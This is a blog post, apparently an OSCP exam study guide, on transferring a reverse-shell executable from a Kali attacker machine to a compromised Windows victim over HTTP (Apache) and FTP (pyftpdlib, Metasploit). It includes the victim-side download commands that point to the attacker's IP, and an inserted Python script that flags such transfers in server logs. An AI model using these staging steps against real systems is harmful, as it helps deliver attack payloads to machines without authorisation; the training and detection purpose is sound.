OSCP: FILE TRANSFER RECIPE FOR DELICIOUS POST EXPLOITATION

Wasim Shaikh
Jun 19 · 9 min read

This article is for everyone working in infosec. When you work in an organization as a security professional, the organization (the SOC team, obviously!) restricts you and makes your work harder: accessing files, installing software on your system, reaching the internet, using email, using shared folders and transferring files between machines may all be limited. It is very annoying when you want to finish a task as quickly as possible but are stuck because organizational policy stops you from moving a file from one PC to another. In that case you should know more than one or two ways of sharing files. Today I am going to share some of the methods widely used by the infosec community, especially the offensive community.

This article is dedicated to all my friends and colleagues who are OSCP (Offensive Security Certified Professional) aspirants and are looking for an end-to-end, consolidated reference of methods for moving files from their own Kali Linux machine to another computer. In OSCP, file transfer comes into the picture once you have access to the remote machine and want to exploit it further to obtain the highest privileges. Instead of searching different places on the internet and in books, I have consolidated almost all the methods (the simple ones, for which you do not need to write any script) required to transfer files to the victim’s machine. I have tried to make sure that readers understand every aspect, from the simple to the difficult steps, in a single reading.

Basically, there are five ways I am going to explain today. Before starting, I want to give you the preamble to understand this write-up better.

Attacker’s Machine: Your local machine (Linux Machine).
This is the Kali Linux machine, the attacker is using it to perform an attack.

Victim’s Machine: Remote computer.
This is the remote machine which belongs to the victim. It is a Windows XP/Windows 7 machine to which the attacker has already obtained some level of access.

File Transferred: reverse_shell.exe
This is the file we are going to transfer as an example from the Attacker’s machine to a Victim’s machine.
For every protocol (every method that I am going to share), we are going to learn it in two phases, A and B.

Step A: Setting server on the Attacker’s machine
I am going to explain the prerequisites for setting up (hosting) a server. Many times the server we want to use is not set up or not installed on the attacker’s machine. In this step, I will explain how to find out whether the server is installed on the machine or not, and if it is not installed, what to do and how to install it.

A.1: Finding a local directory of the server
A local directory is a place where you will keep all the files/payloads that you want to transfer to the victim’s machine. When you want to transfer files to the victim’s machine from the attacker’s machine using any protocol, first you need to keep all those files at one place (known as a local directory of a server) so that you can access them from the remote machine.

A.2: Starting/ Running Server
This is the next step, once the server is installed and available to run. In this step, I will explain the commands to run and start the server.

Step B: Downloading files on Victim’s machine
This will be the final step. In this step, I will explain, how to download files to the victim’s machine from the attacker’s machine.

Following are the methodologies used for file transfer,

However, in PART 1 we will see the first two. To read the remaining methods, please visit: https://medium.com/@dr.spitfire/ocsp-file-transfer-recipe-for-delicious-post-exploitation-a407e00f7346?source=friends_link&sk=cb690ce087469c9effbc699d6b1b1370

1. Using HTTP Protocol
HTTP is the HyperText Transfer Protocol. It runs on port 80 by default. Transferring files using the HTTP protocol is pretty straightforward.

Step A: Setting a Server on the Attacker’s Machine

As I mentioned earlier, I will share a step-by-step procedure. The first step is finding the local directory of the server and storing all the files that we want to transfer to the victim’s machine in that directory.

A.1: Finding a local directory of a server

Here we are going to use an Apache server. Apache comes by default in Kali Linux, so there is no need to install anything; all you need to do is start it. The default local directory (document root) of the Apache web server is /var/www/html. You need to keep all the payloads/files you want to transfer to the victim’s machine in this directory. As shown below, I have kept my file “reverse_shell.exe” there. Use the dir command to see all the files/folders.

root@kali:~# cd /var/www/html
root@kali:/var/www/html# dir

A.2: Starting/ Running a server

As I mentioned earlier, Kali Linux comes with the Apache server by default. All you need is one command to run it. Run the command below in the Kali terminal and your Apache web server will be running,

Please note that the IP address of the machine where I have started the Apache web server is 192.168.1.14.

Step B: Downloading Files on Victim’s Machine

The easiest step is now to download the file on the victim’s machine. Here I am assuming you have gained access to the victim’s machine and can use its browser. Open the browser on the victim’s machine and type the URL below,

http://IP_Address_Of_Attacker's_Machine/reverse_shell.exe

http://192.168.1.14/reverse_shell.exe

You will be able to save the file on the victim’s machine. Please refer to the screenshot below.

Thus, described above is the simplest way of transferring files between machines, using the plain HTTP protocol.

2. Using FTP Protocol
FTP is the File Transfer Protocol. FTP uses port number 21.
Step A: Setting a Server on the Attacker’s Machine
Setting up an FTP server is as simple as HTTP. In the case of FTP, there is more than one way of starting a server on the Kali Linux machine, and depending on the way I start the server, my local directory will change. The first method uses Python’s pyftpdlib server library and the second uses Metasploit’s FTP auxiliary module. We will see them one by one.
A.1: Finding local Directory of Server.
In the case of FTP, the local directory depends on where you start the FTP module. If you are using Python’s FTP server library, “pyftpdlib”, on Kali Linux, the local directory is the directory in which you start the Python module. If you start the module in the root user’s home directory, the local directory will be /root/ on the Kali Linux machine; if you start it in a location such as /root/documents/, the local directory will be /root/documents. I will try to clarify this with the examples and screenshots below.
Starting the Python FTP server library module in the /root directory:
In order to run the pyftpdlib module, you first need to check whether the module is installed on your machine. Even if Python is installed on your Kali Linux, that does not mean this module will be there; Python does not ship with pyftpdlib by default. To check for any module/file, we can use the locate command. Please refer to the screenshot below.
root@kali:/# locate pyftpdlib

If it is installed, the command will list many file/library names containing the module name. If pyftpdlib is not installed, you can install it using the command below,
root@kali:~# apt-get install python-pyftpdlib
While installing a package, Kali Linux may pull in other packages that are no longer needed after the installation. You can remove them using the command below,
root@kali:~# apt autoremove
I assume you now have the pyftpdlib module installed on the machine. To find the local directory where we keep the files to send to the victim’s machine, we will run the server and check the local directory from the victim’s machine. This step comes once we are connected over FTP and logged in as the anonymous user; at that point, from the victim’s machine, we can check what the local directory of this FTP server is and what files it contains.
But I will explain it briefly here,
To start the server from the root user’s home directory on Kali Linux, use the command below,
root@kali:~# python -m pyftpdlib -p 21

Now, check from the victim’s machine where the local directory of this FTP server is. To check, connect from the victim’s machine and use the dir command.
C:\WINDOWS\system32>ftp IP_Address
C:\WINDOWS\system32>ftp 192.168.1.14
Log in as anonymous with any password, then check the directory. Please refer to the screenshot below, taken from the victim’s machine, which shows the local directory as the /root directory of the Kali Linux machine.

Now, we will change the location from which we start the pyftpdlib server, and accordingly the local directory will change.

To change the directory in Kali Linux we use the cd command. I changed to the following directory and started the Python pyftpdlib server at that location. I have also listed all the folders/files at the location where I am starting the pyftpdlib server. Please refer to the screenshot below.

Let me show you that the directory where I am supposed to keep the files has changed. I can verify it using the dir command from the victim’s machine. Please refer to the screenshot below.

Thus, when starting the server with Python’s pyftpdlib, the local directory where we keep the files to transfer to the victim’s machine changes with the location from which we start pyftpdlib. Hence, before starting the pyftpdlib module, change to the location where you have kept all the data to be transferred to the remote machine, and then run pyftpdlib.

Starting Metasploit’s FTP module with an explicit root directory:

This is not the case with Metasploit’s FTP auxiliary module. When you use Metasploit’s FTP auxiliary module, you can specify the local directory explicitly. Please refer to the commands below,

Start Metasploit using the command below,

Set the port, IP and local directory here.

I have now explained the different ways of finding the local directory and keeping files in it, and given an idea of how to set up a server so that it is accessible from the victim’s machine. Let me explain briefly how to run the server.

A.2: Starting/ Running a Server

Starting and running a server with the Python pyftpdlib module is very simple and easy. Use the command below to start the server.

root@kali:~# python -m pyftpdlib -p 21 (You can specify any port number. However, 21 is default).

Starting and running a server using Metasploit’s FTP module is also very simple. Follow the commands below,

msf > use auxiliary/server/ftp

msf auxiliary(server/ftp) > options (shows the port, IP address, and directory options to set)

msf auxiliary(server/ftp) > set FTPROOT /root/usr (/root/usr is the root directory I have set to keep files; the option is FTPROOT for this module)

msf auxiliary(server/ftp) > run

Step B: Downloading Files on Victim’s Machine

Downloading files on the victim’s machine using FTP is as simple as the other methods we have seen. Start the ftp client on the victim’s machine, log in as the anonymous user with any password, and use the get command to download the file from the attacker’s machine to the victim’s machine.

C:\WINDOWS\system32>ftp IP_Address

C:\WINDOWS\system32>ftp 192.168.1.14

ftp> get reverse_shell.exe

After the get command, you will have the reverse_shell.exe file on the victim’s machine. It is saved in the directory from which you started the ftp client (here C:\WINDOWS\system32).
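Both transfers in this write-up, the HTTP download from Apache and the anonymous FTP login followed by get, leave a trace in server logs. As an added detection example (not part of the original post), the script below parses a few constructed Apache access-log lines and pyftpdlib-style log lines and flags exactly those two patterns; the log layouts, IP addresses and the list of extensions are assumptions.

```python
import re

# Constructed sample log lines (not real captures). The Apache lines use the
# combined access-log layout; the FTP lines imitate pyftpdlib's logger format.
APACHE_LOG = [
    '192.168.1.20 - - [19/Jun/2019:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [19/Jun/2019:10:12:09 +0000] "GET /reverse_shell.exe HTTP/1.1" 200 73802 "-" "Mozilla/5.0"',
    '192.168.1.21 - - [19/Jun/2019:10:12:30 +0000] "GET /reverse_shell.exe HTTP/1.1" 404 208 "-" "curl/7.64"',
]
FTP_LOG = [
    "[I 2019-06-19 10:13:22] 192.168.1.20:49152-[anonymous] USER 'anonymous' logged in.",
    "[I 2019-06-19 10:13:40] 192.168.1.20:49152-[anonymous] RETR /root/reverse_shell.exe completed=1 bytes=73802 seconds=0.12",
    "[I 2019-06-19 10:14:02] 192.168.1.22:49201-[alice] RETR /root/notes.txt completed=1 bytes=91 seconds=0.01",
]

# Extensions that should rarely be fetched from an ad-hoc internal file server (assumed list).
SUSPICIOUS_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".hta", ".scr")

APACHE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
FTP_RE = re.compile(
    r"^\[I [^\]]+\] (?P<src>[\d.]+):\d+-\[(?P<user>[^\]]*)\] "
    r"(?:USER '(?P<login>[^']*)' logged in|RETR (?P<path>\S+))"
)


def flag_http_downloads(lines):
    """Return (src_ip, path) for successful GETs of executable-type files."""
    hits = []
    for line in lines:
        m = APACHE_RE.match(line)
        # Only completed (200) GET responses matter; a 404 means nothing was delivered.
        if not m or m["method"] != "GET" or m["status"] != "200":
            continue
        if m["path"].lower().endswith(SUSPICIOUS_EXT):
            hits.append((m["src"], m["path"]))
    return hits


def flag_ftp_transfers(lines):
    """Return (src_ip, user, path): path is None for an anonymous login, else the RETR'd executable."""
    hits = []
    for line in lines:
        m = FTP_RE.match(line)
        if not m:
            continue
        if m["login"] == "anonymous":
            hits.append((m["src"], "anonymous", None))
        elif m["path"] and m["path"].lower().endswith(SUSPICIOUS_EXT):
            hits.append((m["src"], m["user"], m["path"]))
    return hits


if __name__ == "__main__":
    for hit in flag_http_downloads(APACHE_LOG) + flag_ftp_transfers(FTP_LOG):
        print("ALERT", hit)
```

Run against real logs, the same two functions would read /var/log/apache2/access.log and the pyftpdlib console output; the 404 line is deliberately included to show that a failed request is not reported.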

Please visit the link below to read PART 2 of this write-up!

Link: https://medium.com/@dr.spitfire/ocsp-file-transfer-recipe-for-delicious-post-exploitation-a407e00f7346?sk=cb690ce087469c9effbc699d6b1b1370

You can follow me on Twitter: https://twitter.com/Wa_sim_sim

Written by Wasim Shaikh: Security Consultant; Ethical Hacker; Penetration Tester; Bug Bounty Hunter; A son; A brother; A friend! Twitter: @Wa_sim_sim